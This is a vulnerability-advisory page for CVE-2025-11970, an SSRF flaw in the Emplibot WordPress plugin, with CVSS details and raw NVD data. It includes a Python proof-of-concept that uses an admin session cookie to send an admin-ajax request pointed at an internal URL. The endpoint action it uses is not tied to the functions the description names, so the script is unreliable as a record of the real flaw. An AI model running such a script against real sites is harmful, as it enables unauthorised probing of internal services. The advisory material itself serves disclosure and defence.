Security Vulnerability Report
中文
CVE-2025-11970 CVSS 4.4 MEDIUM

CVE-2025-11970

Published: 2025-12-13 16:16:46
Last Modified: 2026-04-15 00:35:42

Description

The Emplibot – AI Content Writer with Keyword Research, Infographics, and Linking | SEO Optimized | Fully Automated plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.9 via the emplibot_call_webhook_with_error() and emplibot_process_zip_data() functions. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Emplibot plugin for WordPress <= 1.0.9 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-11970 PoC - Emplibot WordPress Plugin SSRF Note: Requires administrator privileges on WordPress """ import requests import argparse def exploit_ssrf(target_url, internal_target, cookies): """ Exploit SSRF vulnerability in emplibot_call_webhook_with_error() or emplibot_process_zip_data() functions """ # Target endpoint (requires authentication) endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Malicious payload targeting SSRF data = { 'action': 'emplibot_webhook', 'url': internal_target, # Internal service URL } headers = { 'Content-Type': 'application/x-www-form-urlencoded', } try: response = requests.post(endpoint, data=data, cookies=cookies, headers=headers, timeout=10) print(f"[*] Request sent to: {internal_target}") print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") return response.text except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-11970 SSRF PoC') parser.add_argument('--url', required=True, help='Target WordPress URL') parser.add_argument('--target', required=True, help='Internal target URL') parser.add_argument('--cookie', required=True, help='Admin session cookie') args = parser.parse_args() cookies = {'wordpress_logged_in': args.cookie} exploit_ssrf(args.url, args.target, cookies)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11970", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:45.753", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Emplibot – AI Content Writer with Keyword Research, Infographics, and Linking | SEO Optimized | Fully Automated plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.9 via the emplibot_call_webhook_with_error() and emplibot_process_zip_data() functions. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398720%40emplibot&new=3398720%40emplibot&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/095c6359-112d-4abc-a69b-a623dfd103c0?source=cve", "source": "[email protected]"}]}}